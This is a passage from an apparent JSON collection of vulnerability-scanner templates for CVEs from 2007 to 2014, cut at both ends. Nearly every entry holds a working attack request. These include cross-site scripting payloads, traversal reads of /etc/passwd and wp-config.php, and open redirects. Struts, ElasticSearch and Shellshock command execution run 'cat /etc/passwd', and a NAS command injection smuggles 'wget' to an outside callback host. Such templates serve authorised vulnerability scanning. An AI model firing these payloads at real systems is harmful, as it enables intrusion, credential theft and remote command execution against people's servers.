Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?h=44ea8a6603cbf54e245f37b4ddaf8f36&page=vlf&action=edit&fileName=..\\..\\..\\windows\\win.ini","{{BaseURL}}/source/loggin/page_log_dwn_file.hsp?h=44ea8a6603cbf54e245f37b4ddaf8f36&action=download&fileName=..\\..\\..\\windows\\win.ini"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2012-5913","info":{"name":"WordPress Integrator 1.32 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</sCripT><sCripT>alert(document.domain)</sCripT>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4242","info":{"name":"WordPress Plugin MF Gig Calendar 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-1823","info":{"name":"PHP CGI v5.3.12/5.4.2 Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n<?php echo md5('CVE-2012-1823'); ?>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["3d638155445bffb044eec401381ad784"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0394","info":{"name":"Apache Struts <2.3.1.1 - Remote Code Execution","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/portal/displayAPSForm.action?debug=command&expression={{first}}*{{second}}"],"matchers-condition":"and","matchers":[{"type":"word","words":["{{result}}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-0981","info":{"name":"phpShowtime 2.0 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?r=i/../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-4547","info":{"name":"AWStats 6.95/7.0 - 'awredir.pl' Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E","{{BaseURL}}/cgi-bin/awstats/awredir.pl?url=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-3153","info":{"name":"Oracle Forms & Reports RCE (CVE-2012-3152 & CVE-2012-3153)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/reports/rwservlet/showenv","{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body_1, \"Reports Servlet\")"]},{"type":"dsl","dsl":["!contains(body_2, \"<html\")","!contains(body_2, \"<HTML\")"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"windows_working_path","regex":[".?.?\\\\.*\\\\showenv"]},{"type":"regex","name":"linux_working_path","regex":["/.*/showenv"]}]}]},{"id":"CVE-2012-0996","info":{"name":"11in1 CMS 1.2.1 - Local File Inclusion (LFI)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?class=../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2012-5321","info":{"name":"TikiWiki CMS Groupware v8.3 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/tiki-featured_link.php?type=f&url=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2012-4982","info":{"name":"Forescout CounterACT 6.3.4.1 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/login?a=https://interact.sh"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2012-4032","info":{"name":"WebsitePanel before v1.2.2.1 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /Default.aspx?pid=Login&ReturnUrl=http%3A%2F%2Fwww.interact.sh HTTP/1.1\nHost: {{Hostname}}\nCookie: UserCulture=en-US; .WEBSITEPANELPORTALAUTHASPX=\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36\nContent-Type: application/x-www-form-urlencoded\n\nctl03%24ctl01%24ctl00%24txtUsername={{username}}&ctl03%24ctl01%24ctl00%24txtPassword={{password}}&ctl03%24ctl01%24ctl00%24btnLogin=+++Sign+In+++&ctl03%24ctl01%24ctl00%24ddlLanguage=en-US&ctl03%24ctl01%24ctl00%24ddlTheme=Default\n"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?:\\/\\/|\\/\\/|\\/\\\\\\\\|\\/\\\\)?(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh\\/?(\\/|[^.].*)?$"]}]}]},{"id":"CVE-2011-2780","info":{"name":"Chyrp 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-2744","info":{"name":"Chyrp 2.x - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-1669","info":{"name":"WP Custom Pages 0.5.0.1 - Local File Inclusion (LFI)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-custom-pages/wp-download.php?url=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5265","info":{"name":"Featurific For WordPress 1.6.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/featurific-for-wordpress/cached_image.php?snum=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4804","info":{"name":"Joomla! Component com_kp - 'Controller' Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_kp&controller=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-0049","info":{"name":"Majordomo2 - SMTP/HTTP Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/mj_wwwusr?passw=&list=GLOBAL&user=&func=help&extra=/../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4624","info":{"name":"GRAND FlAGallery 1.57 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/flash-album-gallery/facebook.php?i=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5107","info":{"name":"Alert Before Your Post <= 0.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/alert-before-your-post/trunk/post_alert.php?name=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4336","info":{"name":"Tiki Wiki CMS Groupware 7.0 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/snarf_ajax.php?url=1&ajax=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5179","info":{"name":"Skysa App Bar 1.04 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/skysa-official/skysa.php?submit=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4926","info":{"name":"Adminimize 1.7.22 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/adminimize/adminimize_page.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-4618","info":{"name":"Advanced Text Widget < 2.0.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/advanced-text-widget/readme.txt HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/advanced-text-widget/advancedtext.php?page=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"</script><script>alert(document.domain)</script>\")","contains(body_1, \"Advanced Text Widget\")"],"condition":"and"}]}]},{"id":"CVE-2011-5181","info":{"name":"ClickDesk Live Support Live Chat 2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/clickdesk-live-support-chat/clickdesk.php?cdwidgetid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-5252","info":{"name":"Orchard 'ReturnUrl' Parameter URI - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/orchard/Users/Account/LogOff?ReturnUrl=%2f%2fhttp://interact.sh%3f"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:http?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2011-5106","info":{"name":"WordPress Plugin Flexible Custom Post Type < 0.1.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/flexible-custom-post-type/edit-post.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2011-3315","info":{"name":"Cisco CUCM, UCCX, and Unified IP-IVR- Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ccmivr/IVRGetAudioFile.do?file=../../../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-5728","info":{"name":"phpPgAdmin <=4.1.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E?subject=server&server=test"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(document.domain)</script>","phpPgAdmin"],"condition":"and","case-insensitive":true},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-0885","info":{"name":"Jira Rainbow.Zen - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jira/secure/BrowseProject.jspa?id=%22%3e%3cscript%3ealert(document.domain)%3c%2fscript%3e"],"matchers-condition":"and","matchers":[{"type":"word","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-4556","info":{"name":"OpenSymphony XWork/Apache Struts2 - Remote Code Execution","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/login.action"],"body":"username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D\n","headers":{"Content-Type":"application/x-www-form-urlencoded"},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2007-4504","info":{"name":"Joomla! RSfiles <=1.0.2 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_rsfiles&task=files.display&path=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9606","info":{"name":"Netsweeper 4.0.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/policy/category_table_ajax.php?customctid=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4536","info":{"name":"Infusionsoft Gravity Forms Add-on < 1.5.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/infusionsoft/Infusionsoft/tests/notAuto_test_ContactService_pauseCampaign.php?go=go%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&contactId=contactId%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&campaignId=campaignId%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-8799","info":{"name":"WordPress Plugin DukaPress 2.5.2 - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/dukapress/lib/dp_image.php?src=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_USER","DB_HOST"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3206","info":{"name":"Seagate BlackArmor NAS - Command Injection","severity":"critical"},"requests":[{"raw":["GET /backupmgt/localJob.php?session=fail;wget http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /backupmgt/pre_connect_check.php?auth_name=fail;wget http://{{interactsh-url}}; HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"unsafe":true,"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2014-4550","info":{"name":"Shortcode Ninja <= 1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/shortcode-ninja/preview-shortcode-external.php?shortcode=shortcode%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3e"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4539","info":{"name":"Movies <= 0.6 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/movies/getid3/demos/demo.mimeonly.php?filename=filename%27%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.cookie)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3744","info":{"name":"Node.js st module Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-2321","info":{"name":"ZTE Cable Modem Web Shell","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/web_shell_cmd.gch"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["please input shell command","ZTE Corporation. All rights reserved"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4558","info":{"name":"WooCommerce Swipe <= 2.7.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E "],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-1203","info":{"name":"Eyou E-Mail <3.6 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ntype='|cat /etc/passwd||'\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-10037","info":{"name":"DomPHP 0.83 - Directory Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4940","info":{"name":"WordPress Plugin Tera Charts - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9618","info":{"name":"Netsweeper - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/clientlogin/?srid=&action=showdeny&url="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["name=formtag action=\"../clientlogin/?srid=&action=showdeny&url=\"","placeholder=\"Profile Manager\">","<title>Netsweeper WebAdmin</title>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9615","info":{"name":"Netsweeper 4.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/deny/index.php?dpid=1&dpruleid=1&cat=1&ttl=5018400&groupname=<group_name_eg_netsweeper_student_allow_internet_access&policyname=auto_created&username=root&userip=127.0.0.1&connectionip=127.0.0.1&nsphostname=netsweeper&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9094","info":{"name":"WordPress DZS-VideoGallery Plugin Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/dzs-videogallery/deploy/designer/preview.php?swfloc=%22%3E%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9617","info":{"name":"Netsweeper 3.0.6 - Open Redirection","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/remotereporter/load_logfiles.php?server=127.0.0.1&url=https://interact.sh/"],"matchers":[{"type":"regex","part":"header","regex":["(?m)^(?:Location\\s*?:\\s*?)(?:https?://|//)(?:[a-zA-Z0-9\\-_\\.@]*)interact\\.sh.*$"]}]}]},{"id":"CVE-2014-2962","info":{"name":"Belkin N150 Router 1.00.08/1.00.09 - Path Traversal","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9119","info":{"name":"WordPress DB Backup <=4.5 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/db-backup/download.php?file=../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4210","info":{"name":"Oracle Weblogic - SSRF in SearchPublicRegistries.jsp","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/uddiexplorer/SearchPublicRegistries.jsp?rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search&operator=http://{{interactsh-url}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-6271","info":{"name":"ShellShock - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}","{{BaseURL}}/cgi-bin/status","{{BaseURL}}/cgi-bin/stats","{{BaseURL}}/cgi-bin/test","{{BaseURL}}/cgi-bin/status/status.cgi","{{BaseURL}}/test.cgi","{{BaseURL}}/debug.cgi","{{BaseURL}}/cgi-bin/test-cgi"],"stop-at-first-match":true,"headers":{"Shellshock":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd ","Referer":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd ","Cookie":"() { ignored; }; echo Content-Type: text/html; echo ; /bin/cat /etc/passwd "},"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4513","info":{"name":"ActiveHelper LiveHelp Server 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/activehelper-livehelp/server/offline.php?MESSAGE=MESSAGE%3C%2Ftextarea%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&DOMAINID=DOMAINID&COMPLETE=COMPLETE&TITLE=TITLE&URL=URL&COMPANY=COMPANY&SERVER=SERVER&PHONE=PHONE&SECURITY=SECURITY&BCC=BCC&EMAIL=EMAIL%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&NAME=NAME%22%3E%3Cscript%3Ealert%28document.cookie%29%3C/script%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</textarea></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-5368","info":{"name":"WordPress Plugin WP Content Source Control - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wp-source-control/downloadfiles/download.php?path=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4544","info":{"name":"Podcast Channels < 0.28 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/podcast-channels/getid3/demos/demo.write.php?Filename=Filename%27%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-9608","info":{"name":"Netsweeper 4.0.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/webadmin/policy/group_table_ajax.php/%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["webadminU=","webadmin="],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3704","info":{"name":"Drupal SQL Injection","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/?q=node&destination=node"],"body":"pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5({{num}})),1)%23]=bob&name[0]=a","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["PDOException","{{md5({{num}})}}"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2014-9444","info":{"name":"Frontend Uploader <= 0.9.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?page_id=0&&errors[fu-disallowed-mime-type][0][name]=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-4561","info":{"name":"Ultimate Weather Plugin <= 1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/ultimate-weather-plugin/magpierss/scripts/magpie_debug.php?url=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2014-3120","info":{"name":"ElasticSearch v1.1.1/1.2 RCE","severity":"medium"},"requests":[{"raw":["POST /_search?pretty HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/x-www-form-urlencoded\n\n{\n    \"size\": 1,\n    \"query\": {\n      \"filtered\": {\n        \"query\": {\n          \"match_all\": {\n          }\n        }\n      }\n    },\n    \"script_fields\": {\n        \"command\": {\n            \"script\": \"import java.io.*;new java.util.Scanner(Runtime.getRuntime().exec(\\\"cat /etc/passwd\\\").getInputStream()).useDelimiter(\\\"\\\\\\\\A\\\").next();\"\n        }\n    